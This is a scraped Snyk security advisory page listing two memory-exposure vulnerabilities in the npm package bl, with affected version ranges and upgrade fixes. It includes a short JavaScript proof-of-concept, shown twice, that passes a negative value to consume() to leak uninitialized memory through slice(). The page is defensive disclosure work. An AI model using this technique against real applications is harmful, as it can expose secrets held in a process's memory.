bl@1.0.0 vulnerabilities

Buffer List: collect buffers and access with a standard readable Buffer interface, streamable too!

latest version

6.0.16
latest non vulnerable version

6.0.16
first published

11 years ago
latest version published

2 months ago
licenses detected
- MIT
  >=0
View bl package health on Snyk Advisor Open this link in a new tab

Report a new vulnerability Found a mistake?

Direct Vulnerabilities

Known vulnerabilities in the bl package. This does not include vulnerabilities belonging to this package’s dependencies.

Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.

Fix for free

Vulnerability Vulnerable Version

Vulnerability	Vulnerable Version
H Remote Memory Exposure bl is a library that allows you to collect buffers and access with a standard readable buffer interface. Affected versions of this package are vulnerable to Remote Memory Exposure. If user input ends up in `consume()` argument and can become negative, BufferList state can be corrupted, tricking it into exposing uninitialized memory via regular `.slice()` calls. PoC by chalker const { BufferList } = require('bl') const secret = require('crypto').randomBytes(256) for (let i = 0; i < 1e6; i++) { const clone = Buffer.from(secret) const bl = new BufferList() bl.append(Buffer.from('a')) bl.consume(-1024) const buf = bl.slice(1) if (buf.indexOf(clone) !== -1) { console.error(`Match (at ${i})`, buf) } } How to fix Remote Memory Exposure? Upgrade `bl` to version 2.2.1, 3.0.1, 4.0.3, 1.2.3 or higher.	>=2.2.0 <2.2.1 >=3.0.0 <3.0.1 >=4.0.0 <4.0.3 <1.2.3
M Uninitialized Memory Exposure bl is a storage object for collections of Node Buffers. A possible memory disclosure vulnerability exists when a value of type `number` is provided to the `append()` method and results in concatenation of uninitialized memory to the buffer collection. This is a result of unobstructed use of the `Buffer` constructor, whose insecure default constructor increases the odds of memory leakage.	<0.9.5 >=1.0.0 <1.0.1

Remote Memory Exposure

bl is a library that allows you to collect buffers and access with a standard readable buffer interface.

Affected versions of this package are vulnerable to Remote Memory Exposure. If user input ends up in consume() argument and can become negative, BufferList state can be corrupted, tricking it into exposing uninitialized memory via regular .slice() calls.

PoC by chalker

const { BufferList } = require('bl')
const secret = require('crypto').randomBytes(256)
for (let i = 0; i < 1e6; i++) {
  const clone = Buffer.from(secret)
  const bl = new BufferList()
  bl.append(Buffer.from('a'))
  bl.consume(-1024)
  const buf = bl.slice(1)
  if (buf.indexOf(clone) !== -1) {
    console.error(`Match (at ${i})`, buf)
  }
}

How to fix Remote Memory Exposure?

Upgrade bl to version 2.2.1, 3.0.1, 4.0.3, 1.2.3 or higher.

>=2.2.0 <2.2.1 >=3.0.0 <3.0.1 >=4.0.0 <4.0.3 <1.2.3

Uninitialized Memory Exposure

bl is a storage object for collections of Node Buffers.

A possible memory disclosure vulnerability exists when a value of type number is provided to the append() method and results in concatenation of uninitialized memory to the buffer collection.

This is a result of unobstructed use of the Buffer constructor, whose insecure default constructor increases the odds of memory leakage.

<0.9.5 >=1.0.0 <1.0.1

Go back to all versions of this package

bl@1.0.0 vulnerabilities

Buffer List: collect buffers and access with a standard readable Buffer interface, streamable too!

latest version

latest non vulnerable version

first published

latest version published

licenses detected

Direct Vulnerabilities

PoC by chalker